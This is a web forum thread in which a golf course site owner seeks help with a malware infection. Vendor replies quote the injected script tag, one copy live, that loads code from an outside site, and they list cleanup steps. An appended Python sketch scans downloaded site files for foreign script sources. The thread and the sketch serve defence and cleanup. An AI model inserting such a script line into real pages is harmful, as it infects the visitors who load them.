Not sure where to start
by tiffmill
5 months ago

My website has been infected with Malware: www.bayview-golfcourse.com. It has infected all of the business computers with a Trojan Horse. I do not currently have a clean version of the webfiles, since all the webfiles are on infected computers.

Where do I start first?

by anirban
5 months ago

Hello :-),

Jaal Scan ID # 30983613362-610 output

Malicious code detected on line 9 of www.bayview-golfcourse.com

starts with

<!—ript src=hxxp://vir tualportf olio.ca/ima ges/gifimg>

Please look at the copy of the page on the server, if you cannot locate this code, it is probably being injected at runtime, when a user is requesting the page. It might be useful to then wipe out the hosting directory and check for malware, on the server and in the backend database. You can also ask for help from your hosting provider. Please check out other pages too.

If you have any specific issues feel free to ask for help.

Also, I am collecting info from people affected by attacks like this, if it would be possible for you to share your experience, could you kindly shoot me a mail at a.banerje e @ s top the hac ker .com (please remove the spaces).

We also provide vulnerability identification and mitigation services to help websites from being infected in the first place.

Hope this helps,
-A

Dr. Anirban Banerjee,
Jaal LLC, Riverside, CA.
Site:www.stopthehacker.com
Blog:www.stopthehacker.com/blog
Twitter: @stopthehacker
Facebook: stopthehacker
Jaal: Protecting the Internet, one website at a time™

by tiffmill
5 months ago

This may sound silly, but do I run the risk of infecting a virus free computer by simply deleting this script from my web files?

I am considering wiping the hosting directory; however, how do I check for malware on the server and in the backend database?

Thank you for your help.

Cheers,

Tiffany

by ddatsucuri
5 months ago

By simply deleting the file you are not going to infect your box. However, do not browse your web site with JavaScript enabled, especially if you do not have the latest IE/Windows updates.

To check the server for malware, you have to download your files and do a full scan of them.

If you need someone to do that for you, send us an email.

—dd dd@sucuri.net
http://sucuri.net – Web-based Integrity Monitoring
Let us remove the malware for you!
1 year monitoring plans + malware removal

by ddatsucuri
5 months ago

Hey,

You have to start from the beginning and take the proper incident response actions:

1- Clean your desktops first. Install a good antivirus, anti-spyware and get them cleaned up.
2- Shut down your site, removing all the files (if possible).
3- Once your desktops are clean, download the FTP files from the server, scan them for malware and remove the issues found.
4- Re-upload the files and submit your site to be de-blacklisted by Google.

Just FYI, the malware is the following on your main page:

< script src=http://virtualportfolio.ca/images/gifimg.php >

If you need someone to find and remove all the malware for you and clean up your site and monitor it from now on (to avoid issues like that again), send us an email. We have some good online plans that may fit you.

—dd dd@sucuri.net
http://sucuri.net – Web-based Integrity Monitoring
Let us remove the malware for you!
1 year monitoring plans + malware removal
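
The "download the files and scan them" step from the replies above, as an added example that is not part of the original thread or any poster's tooling: a Python sketch that walks a local copy of the site and lists every script tag loaded from a host other than the site's own domains, which is the form of the tag quoted in the thread. The function names, the extension list and the command-line usage are assumptions made for illustration.

```python
import re
import sys
from pathlib import Path
from urllib.parse import urlparse

# <script ... src=VALUE>, quoted or unquoted, tolerating "< script" spacing.
SCRIPT_SRC = re.compile(
    r"""<\s*script\b[^>]*?\bsrc\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))""",
    re.IGNORECASE,
)
WEB_EXTENSIONS = {".html", ".htm", ".php", ".js", ".asp", ".aspx", ".inc", ".tpl"}


def is_own_host(host, own_hosts):
    """True if host is one of the site's own domains or a subdomain of one."""
    return any(host == h or host.endswith("." + h) for h in own_hosts)


def find_external_scripts(text, own_hosts):
    """Return [(line_number, src)] for script tags loaded from a foreign host."""
    findings = []
    for m in SCRIPT_SRC.finditer(text):
        src = next(g for g in m.groups() if g is not None)
        try:
            host = urlparse(src).hostname  # None for relative paths (js/menu.js)
        except ValueError:  # malformed URL: report it rather than skip it
            host = src
        if host and not is_own_host(host, own_hosts):
            findings.append((text.count("\n", 0, m.start()) + 1, src))
    return findings


def scan_tree(root, own_hosts):
    """Scan a local copy of the site; return [(relative_path, line, src)]."""
    results = []
    for path in sorted(Path(root).rglob("*")):
        if path.is_file() and path.suffix.lower() in WEB_EXTENSIONS:
            text = path.read_text(encoding="utf-8", errors="replace")
            for line, src in find_external_scripts(text, own_hosts):
                results.append((str(path.relative_to(root)), line, src))
    return results


if __name__ == "__main__":
    # Usage: python scan.py <downloaded_site_dir> <own-domain> [<own-domain> ...]
    for rel, line, src in scan_tree(sys.argv[1], set(sys.argv[2:])):
        print(f"{rel}:{line}: external script {src}")
```

This covers only the external-script pattern quoted in the thread; inline or obfuscated injections and the backend database still need the full malware scan the replies describe.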
